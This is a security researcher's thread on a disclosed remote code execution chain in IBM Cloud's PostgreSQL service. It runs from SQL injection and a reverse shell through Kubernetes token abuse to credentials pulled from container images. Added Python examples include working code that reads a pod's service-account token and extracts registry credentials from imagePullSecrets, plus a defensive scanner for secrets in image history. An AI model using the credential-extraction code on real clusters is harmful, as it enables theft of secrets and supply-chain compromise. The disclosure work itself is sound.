Nir Ohfeld
Dec 8 • 16 tweets • 5 min read
We found a Remote Code Execution vulnerability in every #PostgreSQL database in #IBMCloud 😱

Here is how we did it: 🧵

#HellsKeychain
We set up a PostgreSQL instance in IBM Cloud and tried to execute code using the 'COPY FROM PROGRAM' statement. Unfortunately, this failed due to insufficient privileges. We were blocked! 🚫
We reviewed all of IBM Cloud's proprietary functions that had the 'SECURITY DEFINER' flag (meaning they run with the privileges of the function owner, in this case superuser). One of these functions had a SQL Injection vulnerability that we were able to exploit.
We exploited the SQLi to elevate our privileges to superuser and invoked a reverse shell.
We immediately realized that we were running in a K8s environment. Is this environment dedicated only to our account? 🤔 Let's find out.
After some basic recon we found the Kubernetes service account token. Using this token we could now query the K8s API. Way to go! 🎉
We queried the K8s API for the secret referenced by the pod's imagePullSecrets, which gave us plaintext credentials for IBM Cloud's internal container registry.
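The two steps above (mounted service-account token, then the imagePullSecrets lookup) as an added example. This is not code from the thread or from Wiz; it assumes the standard in-cluster layout (token and CA under /var/run/secrets/kubernetes.io/serviceaccount, API server at kubernetes.default.svc) and a Secret of type kubernetes.io/dockerconfigjson. The Pod and Secret objects it parses are constructed inline so it runs offline; the registry name and credentials in them are made up.

```python
"""Recover registry credentials from a pod's imagePullSecrets via the K8s API.

Added example, not code from the original thread or from Wiz. Assumes the
standard in-cluster service-account mount and a dockerconfigjson Secret.
The sample Pod and Secret are constructed, not captured from a real cluster.
"""
import base64
import json
import ssl
import urllib.request
from typing import Dict, List, Tuple

SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"  # default projected mount
API = "https://kubernetes.default.svc"                    # in-cluster API endpoint


def read_sa_file(name: str, sa_dir: str = SA_DIR) -> str:
    """Read token / namespace / ca.crt from the service-account mount ('' outside a pod)."""
    try:
        with open(f"{sa_dir}/{name}", encoding="utf-8") as fh:
            return fh.read().strip()
    except OSError:
        return ""


def image_pull_secret_names(pod: dict) -> List[str]:
    """Names of the Secrets a Pod references under spec.imagePullSecrets."""
    return [ref["name"] for ref in pod.get("spec", {}).get("imagePullSecrets", [])]


def secret_request(namespace: str, name: str, token: str) -> Tuple[str, Dict[str, str]]:
    """URL and headers for GET /api/v1/namespaces/{ns}/secrets/{name} using the SA token."""
    url = f"{API}/api/v1/namespaces/{namespace}/secrets/{name}"
    return url, {"Authorization": f"Bearer {token}", "Accept": "application/json"}


def fetch_secret(namespace: str, name: str) -> dict:
    """Issue the GET with the pod's own token and cluster CA (needs network; unused offline)."""
    url, headers = secret_request(namespace, name, read_sa_file("token"))
    ctx = ssl.create_default_context(cafile=f"{SA_DIR}/ca.crt")
    req = urllib.request.Request(url, headers=headers)
    with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
        return json.load(resp)


def parse_image_pull_secret(secret: dict) -> List[Tuple[str, str, str]]:
    """Return (registry, username, password) for each entry of a dockerconfigjson Secret.

    There are two base64 layers: the API returns data[".dockerconfigjson"]
    base64-encoded, and inside it each auths[registry]["auth"] is
    base64("user:password"). Some entries carry plain username/password fields.
    """
    if secret.get("type") != "kubernetes.io/dockerconfigjson":
        raise ValueError(f"not a dockerconfigjson Secret: {secret.get('type')}")
    cfg = json.loads(base64.b64decode(secret["data"][".dockerconfigjson"]))
    creds = []
    for registry, entry in cfg.get("auths", {}).items():
        if entry.get("auth"):
            user, _, password = base64.b64decode(entry["auth"]).decode("utf-8").partition(":")
        else:
            user, password = entry.get("username", ""), entry.get("password", "")
        creds.append((registry, user, password))
    return creds


def constructed_pod_and_secret() -> Tuple[dict, dict]:
    """Constructed sample objects shaped like the API's Pod and Secret responses."""
    pod = {"kind": "Pod", "metadata": {"namespace": "default"},
           "spec": {"imagePullSecrets": [{"name": "example-pull-secret"}]}}
    dockercfg = {"auths": {"registry.example.internal": {
        "auth": base64.b64encode(b"builder:s3cr3t-pull-token").decode()}}}
    secret = {"kind": "Secret", "type": "kubernetes.io/dockerconfigjson",
              "metadata": {"name": "example-pull-secret", "namespace": "default"},
              "data": {".dockerconfigjson": base64.b64encode(json.dumps(dockercfg).encode()).decode()}}
    return pod, secret


if __name__ == "__main__":
    pod, secret = constructed_pod_and_secret()
    for name in image_pull_secret_names(pod):
        url, _ = secret_request(pod["metadata"]["namespace"], name, read_sa_file("token") or "<token>")
        print("would GET", url)
        for registry, user, password in parse_image_pull_secret(secret):
            print(f"{registry}: {user} / {password}")
```

Inside a real pod, `fetch_secret(read_sa_file("namespace"), name)` performs the same request; whether it succeeds depends on the service account's RBAC, and the defensive reading is the mirror image: a pod that can `get secrets` in its namespace can read every pull secret there, so scope that verb tightly and prefer short-lived registry tokens over long-lived passwords in dockerconfigjson.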
We pulled a few carefully selected images from the container registry and, as usual, scanned them using Yelp's secret scanning tool github.com/Yelp/detect-se…. This effort (surprisingly) yielded 0 useful secrets 😓
We decided to dig deeper, and unpacked each image to reveal its individual layers. This uncovered secrets hidden in the image's history section, which documents EVERY COMMAND USED DURING THE IMAGE BUILD PROCESS. Jackpot 🤑
The secrets we found inside the container's history section were used to pull packages and libraries from an internal artifact server for building the service's images. And, what do you know, they also had Read-Write permissions! 💾
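The layer-history scan described in the two tweets above, as an added example that is not code from the thread or from Wiz (the thread used Yelp's detect-secrets on the image contents; this looks at the image metadata instead). Input is the image config JSON that `docker image inspect` or `skopeo inspect --config` return: each `history[].created_by` holds the Dockerfile instruction that produced a layer, and ARG/ENV entries are marked `empty_layer: true` because they write nothing to the filesystem, which is exactly why a scan of the layer tarballs alone never sees them. The regex set is an assumption covering common leak shapes, not a complete ruleset, and the sample config (hostnames, tokens, commands) is constructed.

```python
"""Scan an image config's build history for credentials left in Dockerfile instructions.

Added example, not code from the original thread or from Wiz. The patterns are
assumptions about common leak shapes; the sample config below is constructed.
"""
import re
from typing import Dict, List

# Common shapes of leaked credentials in build commands (assumptions; extend as needed).
PATTERNS = {
    # ARG/ENV/RUN FOO_TOKEN=value, optionally double-quoted
    "assignment": re.compile(
        r"\b([A-Z0-9_]*(?:TOKEN|PASSWORD|PASSWD|SECRET|API_KEY|APIKEY)[A-Z0-9_]*)=(\"?)([^\s\"]{8,})\2",
        re.I),
    # scheme://user:password@host (pip --index-url, git clone, npm registry, ...)
    "url_credentials": re.compile(r"[a-z][a-z0-9+.-]*://([^/\s:@]+):([^@\s]+)@", re.I),
    # curl -u user:pass / --user user:pass; lookbehind keeps it off "--index-url"
    "basic_auth_flag": re.compile(r"(?<!\S)--?(?:u|user|username)\s+([^\s:]+):(\S+)"),
    # Authorization: Bearer <token> passed on the command line
    "bearer": re.compile(r"Bearer\s+([A-Za-z0-9._~+/=-]{20,})"),
}


def redact(value: str, keep: int = 4) -> str:
    """Keep a short prefix so a finding can be recognised without reprinting the secret."""
    return value[:keep] + "*" * max(0, len(value) - keep)


def scan_history(config: dict) -> List[Dict[str, object]]:
    """Return one finding per pattern match over history[].created_by, in image order."""
    findings = []
    for idx, entry in enumerate(config.get("history", [])):
        cmd = entry.get("created_by", "")
        for kind, rx in PATTERNS.items():
            for m in rx.finditer(cmd):
                findings.append({
                    "history_index": idx,
                    "kind": kind,
                    "match": m.group(0),
                    # True for ARG/ENV/LABEL...: there is no layer tarball to scan for these
                    "empty_layer": bool(entry.get("empty_layer", False)),
                })
    return findings


def history_matches_layers(config: dict) -> bool:
    """Sanity check: non-empty history entries must equal rootfs.diff_ids (one per layer)."""
    layers = sum(1 for h in config.get("history", []) if not h.get("empty_layer", False))
    return layers == len(config.get("rootfs", {}).get("diff_ids", []))


def constructed_config() -> dict:
    """Constructed image config shaped like a real OCI config blob."""
    return {
        "architecture": "amd64", "os": "linux",
        "history": [
            {"created_by": "/bin/sh -c #(nop)  ARG ARTIFACTORY_TOKEN=AKCp8examp1e0123456789abcdef",
             "empty_layer": True},
            {"created_by": "/bin/sh -c #(nop)  ENV PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin",
             "empty_layer": True},
            {"created_by": "/bin/sh -c apt-get update && apt-get install -y ca-certificates curl python3-pip"},
            {"created_by": "/bin/sh -c pip install --index-url "
                           "https://builder:s3cr3t-pull@artifacts.example.internal/api/pypi/simple app==1.2.3"},
            {"created_by": "/bin/sh -c curl -fsSL -u deploy:Pa55word! "
                           "https://artifacts.example.internal/generic/tool.tgz | tar xz -C /opt"},
            {"created_by": "/bin/sh -c curl -fsSL -H \"Authorization: Bearer "
                           "eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJidWlsZGVyIn0.c2lnbmF0dXJl\" "
                           "https://artifacts.example.internal/generic/app.tgz -o /tmp/app.tgz"},
        ],
        # four non-empty history entries -> four layer digests (values are placeholders)
        "rootfs": {"type": "layers", "diff_ids": ["sha256:" + ("%02x" % i) * 32 for i in range(1, 5)]},
    }


if __name__ == "__main__":
    cfg = constructed_config()
    print("history/layers consistent:", history_matches_layers(cfg))
    for f in scan_history(cfg):
        where = "no layer (metadata only)" if f["empty_layer"] else "layer instruction"
        print(f"[{f['history_index']}] {f['kind']:16} {where}: {redact(str(f['match']), 12)}")
```

Feed it the config blob of each image you pull (`docker image inspect IMAGE | jq '.[0]'` yields the same `history` and `rootfs` fields), then scan the unpacked layer tarballs separately for files; the metadata pass is what catches the ARG/ENV/RUN credentials a content scanner misses.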
With these secrets, we authenticated to the internal CI/CD artifact server and could theoretically poison the images that IBM Cloud distributes to all of their customers - performing a supply-chain attack from the CSP's end 😱😱
That would be a terribly irresponsible thing to do, so we just created a dummy file inside that repository to prove to IBM Cloud that we could 🤓
We disclosed our findings to IBM Cloud in the form of a three-part report. IBM Cloud rapidly investigated and fixed the vulnerabilities we discovered. IBM Cloud's security team took the issues very seriously and addressed them promptly and professionally 💪✨
🚨 Oh, and did we mention that IBM also caught us red-handed during our research and let us continue because they understand the value of this sort of research? A prime example of a healthy security culture within an organization. Kudos!
Sounds interesting? Read the full technical details here 👉 wiz.io/blog/hells-key…
💡 Two key takeaways from this thread:

1. When attacking K8s, target imagePullSecrets for access to container registry credentials.

2. Always scan container images (including layers and metadata files) for secrets.

#cybersecurity #k8s #containers #securitytips